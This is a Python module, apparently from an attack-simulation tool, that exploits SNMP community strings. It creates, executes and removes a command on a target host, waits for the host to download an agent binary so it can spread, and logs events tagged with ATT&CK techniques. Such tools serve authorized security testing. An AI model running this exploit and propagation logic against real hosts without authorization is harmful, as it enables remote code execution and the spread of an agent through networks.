from functools import partial, wraps
from ipaddress import IPv4Address
from logging import getLogger
from time import time
from typing import Callable, Tuple, Type

from common.agent_events import ExploitationEvent, PropagationEvent
from common.event_queue import IAgentEventPublisher
from common.tags.attack import (
    EXPLOITATION_FOR_CLIENT_EXECUTION_T1203_TAG,
    EXPLOITATION_OF_REMOTE_SERVICES_T1210_TAG,
    INGRESS_TOOL_TRANSFER_T1105_TAG,
)
from common.types import AgentID, Event
from common.utils.code_utils import insecure_generate_random_string
from infection_monkey.i_puppet import TargetHost

from .snmp_client import SNMPClient
from .snmp_options import SNMPOptions

COMMAND_NAME_LENGTH = 6

logger = getLogger(__name__)


SNMP_EXPLOITER_TAG = "snmp-exploiter"
EXPLOITATION_TAGS = (
    SNMP_EXPLOITER_TAG,
    EXPLOITATION_FOR_CLIENT_EXECUTION_T1203_TAG,
    EXPLOITATION_OF_REMOTE_SERVICES_T1210_TAG,
)
PROPAGATION_TAGS = (SNMP_EXPLOITER_TAG, INGRESS_TOOL_TRANSFER_T1105_TAG)


def repeat_on_error(max_times: int = 3, error_types: Tuple[Type] = (Exception,)):
    """
    Decorator to repeat a command if it fails with an error

    :param times: The maximum number of times to repeat the command
    :param error_types: The types of errors to catch
    """

    def decorator(func):
        @wraps(func)
        def inner(*args, **kwargs):
            for _ in range(max_times - 1):
                try:
                    return func(*args, **kwargs)
                except error_types as err:
                    logger.debug(f"Retrying due to error: {err}")

            # Allow the exception on the last try to bubble up
            return func(*args, **kwargs)

        return inner

    return decorator


class SNMPExploitClient:
    def __init__(
        self,
        agent_id: AgentID,
        agent_event_publisher: IAgentEventPublisher,
        exploiter_name: str,
        snmp_client: SNMPClient,
        generate_command_name: Callable[[], str] = partial(
            insecure_generate_random_string, COMMAND_NAME_LENGTH
        ),
    ):
        self._agent_id = agent_id
        self._agent_event_publisher = agent_event_publisher
        self._exploiter_name = exploiter_name
        self._snmp_client = snmp_client
        self._generate_command_name = generate_command_name

    def exploit_host(
        self,
        host: TargetHost,
        community_string: str,
        command: str,
        agent_binary_downloaded: Event,
        options: SNMPOptions,
    ) -> Tuple[bool, bool]:
        """
        Exploit the host using SNMP using the provided community string

        :param host: The host to exploit
        :param community_string: The community string to use
        :param command: The command to execute
        :param agent_binary_downloaded: An event that will be set when the agent binary is
            downloaded
        :param options: The SNMP options
        :return: A tuple of two booleans: the first indicates whether the exploitation was
            successful, and the second indicates whether the propagation was successful
        """
        exploitation_message = ""
        exploitation_success = True

        timestamp = time()
        try:
            self._exploit(host.ip, community_string, command)
        except Exception as err:
            logger.exception(f"Attempt to exploit {host.ip} failed due to error: {err}")
            exploitation_message = f"{err}"
            exploitation_success = False

        propagation_success = self._evaluate_propagation_success(
            exploitation_success, agent_binary_downloaded, options.agent_binary_download_timeout
        )

        self._publish_exploitation_event(
            host, timestamp, exploitation_success, exploitation_message
        )
        self._publish_propagation_event(host, timestamp, propagation_success)

        return exploitation_success, propagation_success

    def _exploit(self, target_ip: IPv4Address, community_string: str, command: str):
        command_name = self._create_command(target_ip, community_string, command)
        try:
            self._snmp_client.execute_command(target_ip, command_name, community_string)
        finally:
            self._snmp_client.clear_command(target_ip, command_name, community_string)

    @repeat_on_error(max_times=3)
    def _create_command(self, target_ip: IPv4Address, community_string: str, command: str) -> str:
        command_name = self._generate_command_name()
        logger.debug(f"Creating SNMP command {command_name} on {target_ip}")

        self._snmp_client.create_command(target_ip, command_name, community_string, command)

        return command_name

    def _publish_exploitation_event(
        self, host: TargetHost, timestamp: float, success: bool, message: str
    ):
        self._agent_event_publisher.publish(
            ExploitationEvent(
                source=self._agent_id,
                target=host.ip,
                timestamp=timestamp,
                tags=frozenset(EXPLOITATION_TAGS),
                success=success,
                exploiter_name=self._exploiter_name,
                error_message=message,
            )
        )

    def _publish_propagation_event(self, host: TargetHost, timestamp: float, success: bool):
        self._agent_event_publisher.publish(
            PropagationEvent(
                source=self._agent_id,
                target=host.ip,
                timestamp=timestamp,
                tags=frozenset(PROPAGATION_TAGS),
                success=success,
                exploiter_name=self._exploiter_name,
            )
        )

    @staticmethod
    def _evaluate_propagation_success(
        exploitation_success: bool,
        agent_binary_downloaded: Event,
        agent_binary_download_timeout: float,
    ) -> bool:
        if not exploitation_success:
            return False

        logger.debug("Waiting for the target to download the agent binary...")
        agent_binary_downloaded.wait(agent_binary_download_timeout)

        return agent_binary_downloaded.is_set()
